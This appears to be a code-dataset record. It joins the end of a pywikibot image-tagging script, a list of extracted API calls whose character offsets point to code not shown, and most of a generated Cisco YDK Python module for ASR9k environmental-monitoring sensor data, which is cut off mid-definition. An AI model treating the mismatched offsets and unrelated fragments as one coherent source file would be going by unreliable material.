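# over one day of uploads could look like:
#
#   python pwb.py imageuncat.py -logevents:"upload,,20181105,20181106"
#
# -logevents is the replacement that the deprecation warning above recommends
# for the retired -yesterday option.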
|
[
"pywikibot.Site",
"pywikibot.output",
"pywikibot.pagegenerators.GeneratorFactory",
"contextlib.suppress",
"pywikibot.tools.issue_deprecation_warning",
"pywikibot.bot.suggest_help",
"datetime.timedelta",
"pywikibot.handle_args",
"pywikibot.Timestamp.utcnow"
] |
[((41605, 41633), 'pywikibot.Timestamp.utcnow', 'pywikibot.Timestamp.utcnow', ([], {}), '()\n', (41631, 41633), False, 'import pywikibot\n'), ((43456, 43483), 'pywikibot.handle_args', 'pywikibot.handle_args', (['args'], {}), '(args)\n', (43477, 43483), False, 'import pywikibot\n'), ((43496, 43512), 'pywikibot.Site', 'pywikibot.Site', ([], {}), '()\n', (43510, 43512), False, 'import pywikibot\n'), ((44320, 44357), 'pywikibot.pagegenerators.GeneratorFactory', 'pagegenerators.GeneratorFactory', (['site'], {}), '(site)\n', (44351, 44357), False, 'from pywikibot import pagegenerators\n'), ((41658, 41676), 'datetime.timedelta', 'timedelta', ([], {'days': '(-1)'}), '(days=-1)\n', (41667, 41676), False, 'from datetime import timedelta\n'), ((43127, 43181), 'contextlib.suppress', 'suppress', (['pywikibot.EditConflict', 'pywikibot.LockedPage'], {}), '(pywikibot.EditConflict, pywikibot.LockedPage)\n', (43135, 43181), False, 'from contextlib import suppress\n'), ((44963, 45013), 'pywikibot.bot.suggest_help', 'pywikibot.bot.suggest_help', ([], {'missing_generator': '(True)'}), '(missing_generator=True)\n', (44989, 45013), False, 'import pywikibot\n'), ((42565, 42608), 'pywikibot.output', 'pywikibot.output', (['"""Already tagged, skip it"""'], {}), "('Already tagged, skip it')\n", (42581, 42608), False, 'import pywikibot\n'), ((42741, 42779), 'pywikibot.output', 'pywikibot.output', (["('Ignore ' + template)"], {}), "('Ignore ' + template)\n", (42757, 42779), False, 'import pywikibot\n'), ((42806, 42850), 'pywikibot.output', 'pywikibot.output', (["('Not ignoring ' + template)"], {}), "('Not ignoring ' + template)\n", (42822, 42850), False, 'import pywikibot\n'), ((44211, 44247), 'pywikibot.Site', 'pywikibot.Site', (['"""commons"""', '"""commons"""'], {}), "('commons', 'commons')\n", (44225, 44247), False, 'import pywikibot\n'), ((44605, 44758), 'pywikibot.tools.issue_deprecation_warning', 'issue_deprecation_warning', (['"""The usage of "-yesterday\\""""', '"""-logevents:"upload,,YYYYMMDD,YYYYMMDD\\""""', '(2)', 'ArgumentDeprecationWarning'], {'since': '"""20160305"""'}), '(\'The usage of "-yesterday"\',\n \'-logevents:"upload,,YYYYMMDD,YYYYMMDD"\', 2, ArgumentDeprecationWarning,\n since=\'20160305\')\n', (44630, 44758), False, 'from pywikibot.tools import issue_deprecation_warning\n')]
|
""" Cisco_IOS_XR_asr9k_sc_envmon_admin_oper
This module contains a collection of YANG definitions
for Cisco IOS\-XR asr9k\-sc\-envmon package
admin\-plane operational data.
This module contains definitions
for the following management objects\:
environmental\-monitoring\: Admin Environmental Monitoring
Operational data space
Copyright (c) 2013\-2018 by Cisco Systems, Inc.
All rights reserved.
"""
import sys
from collections import OrderedDict
from ydk.types import Entity as _Entity_
from ydk.types import EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.types import Entity, EntityPath, Identity, Enum, YType, YLeaf, YLeafList, YList, LeafDataList, Bits, Empty, Decimal64
from ydk.filters import YFilter
from ydk.errors import YError, YModelError
from ydk.errors.error_handler import handle_type_error as _handle_type_error
class EnvironmentalMonitoring(_Entity_):
"""
Admin Environmental Monitoring Operational data
space
.. attribute:: racks
Table of racks
**type**\: :py:class:`Racks <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring, self).__init__()
self._top_entity = None
self.yang_name = "environmental-monitoring"
self.yang_parent_name = "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper"
self.is_top_level_class = True
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("racks", ("racks", EnvironmentalMonitoring.Racks))])
self._leafs = OrderedDict()
self.racks = EnvironmentalMonitoring.Racks()
self.racks.parent = self
self._children_name_map["racks"] = "racks"
self._segment_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring, [], name, value)
class Racks(_Entity_):
"""
Table of racks
.. attribute:: rack
Number
**type**\: list of :py:class:`Rack <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks, self).__init__()
self.yang_name = "racks"
self.yang_parent_name = "environmental-monitoring"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("rack", ("rack", EnvironmentalMonitoring.Racks.Rack))])
self._leafs = OrderedDict()
self.rack = YList(self)
self._segment_path = lambda: "racks"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks, [], name, value)
class Rack(_Entity_):
"""
Number
.. attribute:: rack (key)
Rack number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: slots
Table of slots
**type**\: :py:class:`Slots <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack, self).__init__()
self.yang_name = "rack"
self.yang_parent_name = "racks"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slots", ("slots", EnvironmentalMonitoring.Racks.Rack.Slots))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slots = EnvironmentalMonitoring.Racks.Rack.Slots()
self.slots.parent = self
self._children_name_map["slots"] = "slots"
self._segment_path = lambda: "rack" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-admin-oper:environmental-monitoring/racks/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack, ['rack'], name, value)
class Slots(_Entity_):
"""
Table of slots
.. attribute:: slot
Name
**type**\: list of :py:class:`Slot <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots, self).__init__()
self.yang_name = "slots"
self.yang_parent_name = "rack"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot", ("slot", EnvironmentalMonitoring.Racks.Rack.Slots.Slot))])
self._leafs = OrderedDict()
self.slot = YList(self)
self._segment_path = lambda: "slots"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots, [], name, value)
class Slot(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: modules
Table of modules
**type**\: :py:class:`Modules <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, self).__init__()
self.yang_name = "slot"
self.yang_parent_name = "slots"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("modules", ("modules", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.modules = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules()
self.modules.parent = self
self._children_name_map["modules"] = "modules"
self._segment_path = lambda: "slot" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot, ['slot'], name, value)
class Modules(_Entity_):
"""
Table of modules
.. attribute:: module
Name
**type**\: list of :py:class:`Module <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, self).__init__()
self.yang_name = "modules"
self.yang_parent_name = "slot"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("module", ("module", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module))])
self._leafs = OrderedDict()
self.module = YList(self)
self._segment_path = lambda: "modules"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules, [], name, value)
class Module(_Entity_):
"""
Name
.. attribute:: module (key)
Module name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_types
Table of sensor types
**type**\: :py:class:`SensorTypes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes>`
**config**\: False
.. attribute:: power
Module Power Draw
**type**\: :py:class:`Power <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, self).__init__()
self.yang_name = "module"
self.yang_parent_name = "modules"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['module']
self._child_classes = OrderedDict([("sensor-types", ("sensor_types", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes)), ("power", ("power", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power))])
self._leafs = OrderedDict([
('module', (YLeaf(YType.str, 'module'), ['str'])),
])
self.module = None
self.sensor_types = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes()
self.sensor_types.parent = self
self._children_name_map["sensor_types"] = "sensor-types"
self.power = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.Power()
self.power.parent = self
self._children_name_map["power"] = "power"
self._segment_path = lambda: "module" + "[module='" + str(self.module) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module, ['module'], name, value)
class SensorTypes(_Entity_):
"""
Table of sensor types
.. attribute:: sensor_type
Type of sensor
**type**\: list of :py:class:`SensorType <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, self).__init__()
self.yang_name = "sensor-types"
self.yang_parent_name = "module"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-type", ("sensor_type", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType))])
self._leafs = OrderedDict()
self.sensor_type = YList(self)
self._segment_path = lambda: "sensor-types"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes, [], name, value)
class SensorType(_Entity_):
"""
Type of sensor
.. attribute:: type (key)
Sensor type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_names
Table of sensors
**type**\: :py:class:`SensorNames <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, self).__init__()
self.yang_name = "sensor-type"
self.yang_parent_name = "sensor-types"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("sensor-names", ("sensor_names", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
])
self.type = None
self.sensor_names = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames()
self.sensor_names.parent = self
self._children_name_map["sensor_names"] = "sensor-names"
self._segment_path = lambda: "sensor-type" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType, ['type'], name, value)
class SensorNames(_Entity_):
"""
Table of sensors
.. attribute:: sensor_name
Name of sensor
**type**\: list of :py:class:`SensorName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, self).__init__()
self.yang_name = "sensor-names"
self.yang_parent_name = "sensor-type"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-name", ("sensor_name", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName))])
self._leafs = OrderedDict()
self.sensor_name = YList(self)
self._segment_path = lambda: "sensor-names"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames, [], name, value)
class SensorName(_Entity_):
"""
Name of sensor
.. attribute:: name (key)
Sensor name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: thresholds
The threshold information
**type**\: :py:class:`Thresholds <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds>`
**config**\: False
.. attribute:: value_detailed
Detailed sensor information including the sensor value
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed>`
**config**\: False
.. attribute:: value_brief
The sensor value
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, self).__init__()
self.yang_name = "sensor-name"
self.yang_parent_name = "sensor-names"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("thresholds", ("thresholds", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds)), ("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.name = None
self.value_brief = None
self.thresholds = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds()
self.thresholds.parent = self
self._children_name_map["thresholds"] = "thresholds"
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "sensor-name" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName, ['name', 'value_brief'], name, value)
class Thresholds(_Entity_):
"""
The threshold information
.. attribute:: threshold
Types of thresholds
**type**\: list of :py:class:`Threshold <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, self).__init__()
self.yang_name = "thresholds"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold", ("threshold", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold))])
self._leafs = OrderedDict()
self.threshold = YList(self)
self._segment_path = lambda: "thresholds"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds, [], name, value)
class Threshold(_Entity_):
"""
Types of thresholds
.. attribute:: type (key)
Threshold type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: value_detailed
Detailed sensor threshold information
**type**\: :py:class:`ValueDetailed <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_admin_oper.EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed>`
**config**\: False
.. attribute:: trap
Threshold trap enable flag true\-ENABLE, false\-DISABLE
**type**\: bool
**config**\: False
.. attribute:: value_brief
Threshold value for the sensor
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, self).__init__()
self.yang_name = "threshold"
self.yang_parent_name = "thresholds"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("value-detailed", ("value_detailed", EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
('trap', (YLeaf(YType.boolean, 'trap'), ['bool'])),
('value_brief', (YLeaf(YType.str, 'value-brief'), ['str'])),
])
self.type = None
self.trap = None
self.value_brief = None
self.value_detailed = EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed()
self.value_detailed.parent = self
self._children_name_map["value_detailed"] = "value-detailed"
self._segment_path = lambda: "threshold" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold, ['type', 'trap', 'value_brief'], name, value)
class ValueDetailed(_Entity_):
"""
Detailed sensor threshold
information
.. attribute:: threshold_severity
Indicates minor, major, critical severities
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_relation
Indicates relation between sensor value and threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_value
Value of the configured threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_evaluation
Indicates the result of the most recent evaluation of the threshold
**type**\: bool
**config**\: False
.. attribute:: threshold_notification_enabled
Indicates whether or not a notification should result, in case of threshold violation
**type**\: bool
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "threshold"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
])
self.threshold_severity = None
self.threshold_relation = None
self.threshold_value = None
self.threshold_evaluation = None
self.threshold_notification_enabled = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds.Threshold']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.Thresholds']['meta_info']
class ValueDetailed(_Entity_):
"""
Detailed sensor information including
the sensor value
.. attribute:: field_validity_bitmap
Sensor valid bitmap
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: device_description
Device Name
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: units
Units of variable being read
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: device_id
Identifier for this device
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: value
Current reading of sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: alarm_type
Indicates threshold violation
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: data_type
Sensor data type enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: scale
Sensor scale enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: precision
Sensor precision range
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: status
Sensor operation state enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age_time_stamp
Age of the sensor value; set to the current time if the value is read directly from the sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_rate
Sensor value update rate; set to 0 if the sensor value is updated and evaluated immediately
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: average
Average sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: minimum
Minimum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: maximum
Maximum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: interval
Time Interval over which sensor value is monitored
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-admin-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, self).__init__()
self.yang_name = "value-detailed"
self.yang_parent_name = "sensor-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('units', (YLeaf(YType.str, 'units'), ['str'])),
('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
('value', (YLeaf(YType.uint32, 'value'), ['int'])),
('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
('status', (YLeaf(YType.uint32, 'status'), ['int'])),
('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
('average', (YLeaf(YType.int32, 'average'), ['int'])),
('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
])
self.field_validity_bitmap = None
self.device_description = None
self.units = None
self.device_id = None
self.value = None
self.alarm_type = None
self.data_type = None
self.scale = None
self.precision = None
self.status = None
self.age_time_stamp = None
self.update_rate = None
self.average = None
self.minimum = None
self.maximum = None
self.interval = None
self._segment_path = lambda: "value-detailed"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName.ValueDetailed']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_admin_oper as meta
return meta._meta_table['EnvironmentalMonitoring.Racks.Rack.Slots.Slot.Modules.Module.SensorTypes.SensorType.SensorNames.SensorName']['meta_info']
@staticmethod
def _meta_info():
